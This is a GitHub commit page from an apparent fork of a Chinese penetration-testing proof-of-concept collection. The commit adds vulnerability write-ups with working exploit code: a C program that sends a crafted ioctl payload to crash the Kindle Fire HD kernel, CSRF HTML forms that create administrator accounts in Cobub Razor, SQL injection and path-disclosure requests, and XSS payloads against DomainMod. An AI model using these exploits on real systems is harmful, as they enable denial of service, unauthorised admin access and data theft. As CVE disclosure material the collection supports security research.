forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
29 changed files
with
1,015 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,230 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞|2018-10-10|大兵|[http://www.amazon.com/](http://www.amazon.com/) | [下载连接](https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2) |Fire OS 4.5.5.3| [CVE-2018-11021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。 | ||
|
||
### POC实现代码如下: | ||
|
||
> exp代码如下: | ||
``` c | ||
/* | ||
* This is poc of Kindle Fire HD 3rd | ||
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517. | ||
* Related buggy struct name is dsscomp_setup_dispc_data. | ||
* This Poc should run with permission to do ioctl on /dev/dsscomp. | ||
* | ||
* The fowllwing is kmsg of kernel crash infomation: | ||
* | ||
* | ||
*/ | ||
#include <stdio.h> | ||
#include <fcntl.h> | ||
#include <errno.h> | ||
#include <sys/ioctl.h> | ||
|
||
const static char *driver = "/dev/dsscomp"; | ||
static command = 1118064517; | ||
|
||
int main(int argc, char **argv, char **env) { | ||
unsigned int payload[] = { | ||
0xffffffff, | ||
0x00000003, | ||
0x5d200040, | ||
0x79900008, | ||
0x8f5928bd, | ||
0x78b02422, | ||
0x00000000, | ||
0xffffffff, | ||
0xf4c50400, | ||
0x007fffff, | ||
0x8499f562, | ||
0xffff0400, | ||
0x001b131d, | ||
0x60818210, | ||
0x00000007, | ||
0xffffffff, | ||
0x00000000, | ||
0x9da9041c, | ||
0xcd980400, | ||
0x001f03f4, | ||
0x00000007, | ||
0x2a34003f, | ||
0x7c80d8f3, | ||
0x63102627, | ||
0xc73643a8, | ||
0xa28f0665, | ||
0x00000000, | ||
0x689e57b4, | ||
0x01ff0008, | ||
0x5e7324b1, | ||
0xae3b003f, | ||
0x0b174d86, | ||
0x00000400, | ||
0x21ffff37, | ||
0xceb367a4, | ||
0x00000040, | ||
0x00000001, | ||
0xec000f9e, | ||
0x00000001, | ||
0x000001ff, | ||
0x00000000, | ||
0x00000000, | ||
0x0000000f, | ||
0x0425c069, | ||
0x038cc3be, | ||
0x0000000f, | ||
0x00000080, | ||
0xe5790100, | ||
0x5b1bffff, | ||
0x0000d355, | ||
0x0000c685, | ||
0xa0070000, | ||
0x0010ffff, | ||
0x00a0ff00, | ||
0x00000001, | ||
0xff490700, | ||
0x0832ad03, | ||
0x00000006, | ||
0x00000002, | ||
0x00000001, | ||
0x81f871c0, | ||
0x738019cb, | ||
0xbf47ffff, | ||
0x00000040, | ||
0x00000001, | ||
0x7f190f33, | ||
0x00000001, | ||
0x8295769b, | ||
0x0000003f, | ||
0x869f2295, | ||
0xffffffff, | ||
0xd673914f, | ||
0x05055800, | ||
0xed69b7d5, | ||
0x00000000, | ||
0x0107ebbd, | ||
0xd214af8d, | ||
0xffff4a93, | ||
0x26450008, | ||
0x58df0000, | ||
0xd16db084, | ||
0x03ff30dd, | ||
0x00000001, | ||
0x209aff3b, | ||
0xe7850800, | ||
0x00000002, | ||
0x30da815c, | ||
0x426f5105, | ||
0x0de109d7, | ||
0x2c1a65fc, | ||
0xfcb3d75f, | ||
0x00000000, | ||
0x00000001, | ||
0x8066be5b, | ||
0x00000002, | ||
0xffffffff, | ||
0x5cf232ec, | ||
0x680d1469, | ||
0x00000001, | ||
0x00000020, | ||
0xffffffff, | ||
0x00000400, | ||
0xd1d12be8, | ||
0x02010200, | ||
0x01ffc16f, | ||
0xf6e237e6, | ||
0x007f0000, | ||
0x01ff08f8, | ||
0x000f00f9, | ||
0xbad07695, | ||
0x00000000, | ||
0xbaff0000, | ||
0x24040040, | ||
0x00000006, | ||
0x00000004, | ||
0x00000000, | ||
0xbc2e9242, | ||
0x009f5f08, | ||
0x00800000, | ||
0x00000000, | ||
0x00000001, | ||
0xff8800ff, | ||
0x00000001, | ||
0x00000000, | ||
0x000003f4, | ||
0x6faa8472, | ||
0x00000400, | ||
0xec857dd5, | ||
0x00000000, | ||
0x00000040, | ||
0xffffffff, | ||
0x3f004874, | ||
0x0000b77a, | ||
0xec9acb95, | ||
0xfacc0001, | ||
0xffff0001, | ||
0x0080ffff, | ||
0x3600ff03, | ||
0x00000001, | ||
0x8fff7d7f, | ||
0x6b87075a, | ||
0x00000000, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141, | ||
0x001001ff, | ||
0x00000000, | ||
0x00000001, | ||
0xff1f0512, | ||
0x00000001, | ||
0x51e32167, | ||
0xc18c55cc, | ||
0x00000000, | ||
0xffffffff, | ||
0xb4aaf12b, | ||
0x86edfdbd, | ||
0x00000010, | ||
0x0000003f, | ||
0xabff7b00, | ||
0xffff9ea3, | ||
0xb28e0040, | ||
0x000fffff, | ||
0x458603f4, | ||
0xffff007f, | ||
0xa9030f02, | ||
0x00000001, | ||
0x002cffff, | ||
0x9e00cdff, | ||
0x00000004, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141, | ||
0x41414141 }; | ||
|
||
int fd = 0; | ||
fd = open(driver, O_RDWR); | ||
if (fd < 0) { | ||
printf("Failed to open %s, with errno %d\n", driver, errno); | ||
system("echo 1 > /data/local/tmp/log"); | ||
return -1; | ||
} | ||
printf("Try open %s with command 0x%x.\n", driver, command); | ||
printf("System will crash and reboot.\n"); | ||
if(ioctl(fd, command, &payload) < 0) { | ||
printf("Allocation of structs failed, %d\n", errno); | ||
system("echo 2 > /data/local/tmp/log"); | ||
return -1; | ||
} | ||
close(fd); | ||
return 0; | ||
} | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.7.2存在跨站请求伪造漏洞|2018-03-06|Kyhvedn([email protected]、[email protected])|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.7.2 | [CVE-2018-7720](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。 | ||
### POC实现代码如下: | ||
|
||
> 利用代码如下: | ||
``` html | ||
<body> | ||
<script>alert(document.cookie)</script> | ||
<form action="http://localhost/index.php?/user/createNewUser/" method="POST"> | ||
<input type="hidden" name="username" value="test123" /> | ||
<input type="hidden" name="email" value="test@test123.test" /> | ||
<input type="hidden" name="password" value="test" /> | ||
<input type="hidden" name="confirm_password" value="test" /> | ||
<input type="hidden" name="userrole" value="3" /> | ||
<input type="hidden" name="user/ccreateNewUser" value="�ˆ›�»�" /> | ||
<input type="submit" value="Submit request" /> | ||
</form> | ||
</body> | ||
</html> | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.7.2越权增加管理员账户|2018-04-09|ppb([email protected])|[https://github.com/cobub/razor/](https://github.com/cobub/razor/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.72| [CVE-2018-7745](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/161)告知作者。 | ||
|
||
### POC实现代码如下: | ||
|
||
> 利用代码如下: | ||
``` html | ||
<html> | ||
<body> | ||
<script>history.pushState('', '', '/')</script> | ||
<form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST"> | ||
<input type="hidden" name="siteurl" value="http://127.0.0.1/" /> | ||
<input type="hidden" name="superuser" value="test" /> | ||
<input type="hidden" name="pwd" value="test123" /> | ||
<input type="hidden" name="verifypassword" value="test123" /> | ||
<input type="hidden" name="email" value="[email protected]" /> | ||
<input type="submit" value="Submit request" /> | ||
</form> | ||
</body> | ||
</html> | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.8.0存在SQL注入漏洞|2018-04-16|Kyhvedn([email protected]、[email protected])|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.8.0| [CVE-2018-8057](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。 | ||
|
||
### POC实现代码如下: | ||
|
||
> http://localhost/index.php?/manage/channel/addchannel | ||
> POST data: | ||
> 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1 | ||
> 2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1 | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|Cobub Razor 0.8.0存在物理路径泄露漏洞|2018-04-20|Kyhvedn([email protected]、[email protected])|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) | 0.8.0| [CVE-2018-8056](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056)/[CVE-2018-8770](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770)| | ||
|
||
#### 漏洞概述 | ||
|
||
> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。 | ||
### POC实现代码如下: | ||
|
||
> 方法一: | ||
``` raw | ||
URL: http://localhost/export.php | ||
HTTP Method: GET | ||
URL: http://localhost/index.php?/manage/channel/addchannel | ||
HTTP Method: POST | ||
Data: channel_name=test"&platform=1 | ||
``` | ||
> 方法二: | ||
> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。 | ||
``` raw | ||
HTTP Method: GET | ||
http://localhost/tests/generate.php | ||
http://localhost/tests/controllers/getConfigTest.php | ||
http://localhost/tests/controllers/getUpdateTest.php | ||
http://localhost/tests/controllers/postclientdataTest.php | ||
http://localhost/tests/controllers/posterrorTest.php | ||
http://localhost/tests/controllers/posteventTest.php | ||
http://localhost/tests/controllers/posttagTest.php | ||
http://localhost/tests/controllers/postusinglogTest.php | ||
http://localhost/tests/fixtures/Controller_fixt.php | ||
http://localhost/tests/fixtures/Controller_fixt2.php | ||
http://localhost/tests/fixtures/view_fixt2.php | ||
http://localhost/tests/libs/ipTest.php | ||
http://localhost/tests/models/commonDbfix.php | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
### 漏洞简介 | ||
|
||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| | ||
--------|--------|---------|--------|-------|----|------| | ||
|DomainMod的XSS|2018-05-24|longer/套哥([email protected])|[https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) | [https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) |4.09.03/4.10.0| [CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11404](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404)/[CVE-2018-11558](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558)/[CVE-2018-11559](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559)| | ||
|
||
#### 漏洞概述 | ||
|
||
> DomainMod v4.09.03版本和v4.10.0版本 存在XSS的页面 | ||
|
||
### POC实现代码如下: | ||
|
||
> DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。 | ||
>CSRF测试页面代码如下: | ||
``` html | ||
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E | ||
``` | ||
> DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。 | ||
>CSRF测试页面代码如下: | ||
``` html | ||
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E | ||
``` | ||
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。 | ||
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发: | ||
``` raw | ||
post url https://demo.domainmod.org/settings/profile/ | ||
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0 | ||
``` | ||
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。 | ||
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发: | ||
``` raw | ||
post url https://demo.domainmod.org/settings/profile/ | ||
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0 | ||
``` |
Oops, something went wrong.